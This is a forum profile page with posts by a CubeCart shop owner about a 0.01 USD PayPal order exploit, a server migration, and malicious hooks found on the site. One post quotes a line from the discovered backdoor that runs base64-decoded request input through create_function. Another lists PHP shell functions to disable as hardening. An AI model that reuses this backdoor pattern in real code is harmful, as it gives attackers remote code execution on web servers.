Jump to content

jbranscum

Member
  • Posts

    8
  • Joined

  • Last visited

jbranscum's Achievements

Newbie

Newbie (1/14)

0

Reputation

  1. Greetings all I posted a Github issue but have not heard back so I'd like to see if there is prior experience with this. My spouse has a CC store with embroidery designs; all digital downloads. This morning a user rang up every single design in the store into a sale worth hundreds of dollars but only paid 0.01USD and CC approved it. I find it hard to believe I'm the first victim of this but I don't understand where things went wrong to allow a payment less than the order total to be approved; surely CC/Paypal Payment module would do a sanity check on the IPN data to make sure the amounts matched up. I'm not entirely sure what can be posted to ensure I'm not giving away too much information for some ne'er-do-well to capitalize on it. I checked the webserver logs and the IPN came directly from Paypal's server Running CC 6.1.8 with Paypal Standard 1.0.5 on NginX using FastCGI+PHP So.. What happened? Where did it all go wrong? How do I prevent this from happening in the future?
  2. One more reply for anyone that is looking to secure their php installation in the future; add the following to your php.ini file: disable_functions =exec, system, passthru, pcntl_exec, popen, proc_open, shell_exec;
  3. Thanks for pointing out that there would be an associated file; May 13 2016. Quite the coincidence that I'd happen to find the exploits exactly one year later. Unfortunately I don't have the apache logs from that time to review what was done. Thanks again for the help.
  4. Both hooks are identical; the first is a very simple decode that does a lot of file manipulation. The second one I don't have enough php wits to crack: $f = create_function('',base64_decode(strtr(str_replace(chr(10),'',$_REQUEST['c0d3']), '-_,', '+/='))); Something about replacing a newline but the rest doesn't make much sense in context.
  5. Hello all I recently made the switch from a modded v5 to 6.1.7 using these fantastic instructions from smither but I have a nagging sense that these two hooks I'm seeing may not be part of CC. To my knowledge, my previous v5 modded site was never compromised and the only people that had access to it were myself, my spouse and the third party that did the aforementioned modding. They were enabled after the update but I have since disabled them. Thoughts? By the way; v6 runs very well on nginx with a few tweaks. EDIT: Nevermind; I've answered my own question. I decoded the hooks and they're both decidedly nefarious; looks like the store was compromised or the third party left us "presents". No way of getting a time period on when they were added so its hard to know if they were present for two weeks or two years. There is a lot of file manipulation in the decoded script so I'm going to go with 'compromised site'.
  6. I downgraded to PHP 5.3 and just found ModsIndex has IP resticted my mods to the old server IP In the meantime, can ya'll set me up with a temporary license key for testing on this domain I'm using? test.www.cutebykira.com is the domain. I would appreciate it. Thank you. I downgraded to PHP 5.3 and just found ModsIndex has IP resticted my mods to the old server IP In the meantime, can ya'll set me up with a temporary license key for testing on this domain I'm using? test.www.cutebykira.com is the domain. I would appreciate it. Thank you.
  7. Thanks for the heads up. I'll go remove the offending mods and report back.
  8. Good morning, I'm currently in the testing phase for moving my cubecart installation to a new server. The old server is running 5.2.2 and I was able to upgrade on the new installation to 5.2.14 with minimal issues. After the install was complete, I got the dreaded blank page issue. I enabled debugging and I am getting a bunch of these: I hope I don't need to downgrade php in order to continue using CubeCart. Some info:
×
×
  • Create New...